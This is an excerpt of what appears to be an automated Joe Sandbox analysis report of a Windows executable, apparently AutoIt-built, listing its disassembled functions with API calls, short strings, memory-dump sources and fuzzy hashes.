                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _strncmp
                                                            • String ID: Q\E
                                                            • API String ID: 909875538-2189900498
                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                            Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 2652923123-3941886329
                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                            Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: U$\
                                                            • API String ID: 2666721431-100911408
                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                            Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                            • String ID: LPT
                                                            • API String ID: 3035604524-1350329615
                                                            • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                            • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                            Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$h
                                                            • API String ID: 4104443479-677774858
                                                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                            Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID: &
                                                            • API String ID: 2931989736-1010288
                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                            Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                            Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00466825
                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                            Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                            Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_sprintf_strlen
                                                            • String ID: %02X
                                                            • API String ID: 1921645428-436463671
                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                            Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                            Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                            Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                            Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: htonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 3832099526-2422070025
                                                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                            Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: InternetOpen
                                                            • String ID: <local>
                                                            • API String ID: 2038078732-4266983199
                                                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                            • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                            • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                            Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
